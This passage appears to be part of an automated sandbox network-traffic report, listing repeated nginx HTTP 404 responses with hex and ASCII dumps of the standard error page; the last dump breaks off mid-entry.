Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:43 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 